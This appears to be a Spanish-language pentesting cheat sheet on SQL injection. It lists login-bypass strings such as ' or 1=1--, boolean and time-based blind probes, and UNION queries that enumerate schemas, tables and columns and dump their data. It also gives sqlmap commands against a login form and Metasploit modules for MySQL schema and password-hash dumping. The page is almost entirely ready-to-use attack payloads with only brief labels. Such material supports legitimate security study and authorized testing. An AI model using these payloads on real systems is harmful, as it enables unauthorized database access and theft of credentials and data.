💾SQLi

admin' --
admin' #
admin' /*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

SQLi test:

'or 1=1-- -
'or sleep(5)-- -
'and sleep(5)-- -

Dump Manual:

# Comprobar número DBs
' union select 1,2,3-- - # Inyectamos en el número/s que se muestre.

# Enumera DB
' union select group_concat (schema_name)2,3 from information_schema.schemata-- -

# Enumera Tablas
' union select group_concat (table_name)2,3 from information_schema.tables where table_schema="<db-name>"-- -

# Enumera Columnas
' union select group_concat (column_name)2,3 from information_schema.columns where table_schema="<db-name>" and table_name="<table-name>"-- -

# Enumera Data
' union select group_concat (<column-name>)2,3 from <table-name>

SQLMap

# Test
sqlmap -u <http://sitio.web/view.php?parámetro=1>

# Vulnerable Login form
sqlmap -u <"http://URL/login.php"> --data=<user=x&pass=x> -p <parametro> --dbs
sqlmap -u <"http://URL/login.php"> --data=<user=x&pass=x> -p parametro -D <db> --tables
sqlmap -u <"http://URL/login.php"> --data=<user=x&pass=x> -p parametro -D <db> -T <table> --columns
sqlmap -u <"http://URL/login.php"> --data=<user=x&pass=x> -p parametro -D <db> -T <table> -C <columns> --dump

MySQL dump - METASPLOIT

mysql -h <IPv> -u <user> -p

msfconsole
search mysql_sql
search mysql_schemadump # Tablas
search mysql_hashdump # Hashes

Lectura de SQLite DB:

sqlite <db-name>
.tables (Ver tablas)
PRAGMA table_info(table-name);
SELECT * FROM (table-name);

Manual Blind SQLi

Authentication Bypass:

select * from users where username='' and password='' OR 1=1;

Boolean BasedzZZzzZZzzz...

' UNION SELECT 1,2,3;--
' UNION SELECT 1,2,3 where database() like 's%';--
' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'db' and table_name like 'a%';--
' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='db' and TABLE_NAME='table' and COLUMN_NAME like 'a%';
' UNION SELECT 1,2,3 from users where username like 'a%
' UNION SELECT 1,2,3 from users where username='admin' and password like 'a%

Time Based:

' UNION SELECT SLEEP(5),2;--
parametro=' UNION SELECT SLEEP(5),2 where database() like 'u%';--

Última actualización hace 5 meses

SQLi PoC - Login Form

SQLi test:

Dump Manual:

SQLMap

MySQL dump - METASPLOIT

Lectura de SQLite DB:

Manual Blind SQLi

Authentication Bypass:

Boolean BasedzZZzzZZzzz...

Time Based: